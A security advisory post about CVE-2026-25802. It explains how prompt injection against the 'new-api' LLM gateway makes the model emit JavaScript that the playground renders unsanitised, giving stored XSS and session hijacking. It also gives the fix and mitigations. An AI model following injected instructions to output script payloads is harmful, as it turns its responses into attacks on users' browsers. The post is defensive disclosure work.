DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2026-25802: Prompt Injection to Stored XSS: Unpacking CVE-2026-25802 in new-api

#security #cve #cybersecurity

Prompt Injection to Stored XSS: Unpacking CVE-2026-25802 in new-api

Vulnerability ID: CVE-2026-25802
CVSS Score: 7.6
Published: 2026-02-23

A critical Cross-Site Scripting (XSS) vulnerability was discovered in the 'new-api' LLM gateway, specifically within its playground component. The flaw allows attackers to weaponize Large Language Model outputs via indirect prompt injection, causing the application to render malicious JavaScript that executes in the victim's browser. The root cause lies in the unsafe use of React's 'dangerouslySetInnerHTML' without adequate sanitization.

TL;DR

The 'new-api' LLM gateway trusted AI-generated content too much. By asking the AI to write malicious code, attackers could trigger a Stored XSS in the playground UI, leading to session hijacking. Fixed in version 0.10.8-alpha.9 by sandboxing the output.

⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-79
  • CVSS Score: 7.6 (High)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • Impact: Session Hijacking, RCE (via Admin context)
  • Exploit Status: PoC Available

Affected Systems

  • new-api (QuantumNous)
  • new-api: < 0.10.8-alpha.9 (Fixed in: 0.10.8-alpha.9)

Code Analysis

Commit: ab5456e

Refactor Markdown rendering to use sandboxed iframe and escape HTML in JSON viewer

- <div dangerouslySetInnerHTML={{ __html: content }} />
+ <iframe sandbox='allow-same-origin' srcDoc={code} />
Enter fullscreen mode Exit fullscreen mode

Exploit Details

  • GitHub Advisory: Proof of concept demonstrating redirection to Google via LLM prompt.

Mitigation Strategies

  • Input Sanitization: Use libraries like DOMPurify before passing strings to dangerous sinks.
  • Output Encoding: Always escape HTML entities when rendering user or AI-generated content.
  • Sandboxing: Use iframe sandboxing with strict policies (no 'allow-scripts') for untrusted HTML previews.
  • Content Security Policy (CSP): Implement a strict CSP that disallows inline scripts.

Remediation Steps:

  1. Pull the latest Docker image or source code for new-api.
  2. Verify the version is at least 0.10.8-alpha.9.
  3. Restart the service container.
  4. Clear browser caches to ensure the new frontend assets are loaded.

References

Read the full report for CVE-2026-25802 on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)